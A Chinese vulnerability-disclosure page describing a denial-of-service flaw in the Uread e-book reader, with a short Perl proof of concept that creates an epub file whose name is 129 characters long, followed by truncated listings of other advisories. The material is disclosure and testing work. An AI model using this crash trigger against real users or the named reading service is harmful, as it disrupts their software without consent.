Uread阅读器拒绝服务漏洞的分析与解决
所属分类:
网络安全 / 漏洞分析
阅读数:
1499
收藏 0赞 0分享
Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。
远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。
测试证明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修复方案:
目前厂商还没有提供补丁或者升级程序。
作者 demonalex
2007年12月网络安全漏洞总结
声明:本十大安全漏洞由NSFOCUS安全小组根据安全漏洞的严重程度、影响范围等因素综合评出,仅供参考
1.2007-12-11 Microsoft消息队列服务栈溢出漏洞
综述:
Microsoft Windows是微软发布的非常流行的操
收藏 0赞 0分享
OmniPCX Enterprise存在远程命令注入漏洞
受影响系统:
Alcatel-Lucent OmniPCX Enterprise <= 7.1
不受影响系统:
Alcatel-Lucent OmniPCX Enterprise 7.1 patch F5.401.19
Alcatel-Luc
收藏 0赞 0分享
Sun Java jpiexp32.dll对象名称含空指针引用漏洞
受影响系统:
Sun JRE < 5.0 Update 14
不受影响系统:
Sun JRE 5.0 Update 14
描述:
Solaris系统的Java运行时环境(JRE)为JAVA应用程序提供可靠的运行环境。
JRE处理畸
收藏 0赞 0分享
InterBase和Firebird远程栈缓冲区溢出漏洞
受影响系统:
Borland InterBase WI-V8.1.0.257
Borland InterBase WI-V8.0.0.123
Borland InterBase WI-V7.5.1.80
Borland InterB
收藏 0赞 0分享
IE 存在document.open()方式地址欺骗漏洞
受影响系统:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft
收藏 0赞 0分享
Microsoft IE onunload事件地址栏欺骗漏洞
受影响系统:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Ex
收藏 0赞 0分享
F2blog XMLRPC 上传任意文件漏洞
刚从官方下载的最新版:F2blog-v1.2_build_03.01_full
存在漏洞文件:xmlrpc.php,
影响:可上传任意文件到服务器。
原理:get_http_raw_post_data()是获取最原始的传递过来的数据,也是说不会因为PHP环境的ma
收藏 0赞 0分享
FTP客户端目录遍历漏洞可向任意位置写文件
FFFTP是一款小型的FTP客户端软件。FFFTP客户端没有正确地验证FTP服务器所返回的LIST命令响应中包含有目录遍历序列(斜线)的文件名,如果用户受骗从恶意的FTP服务器下载的目录包含有带有恶意文件名的文件的话,就可能导致向用户系统的任意位置写入文件。
受影
收藏 0赞 0分享
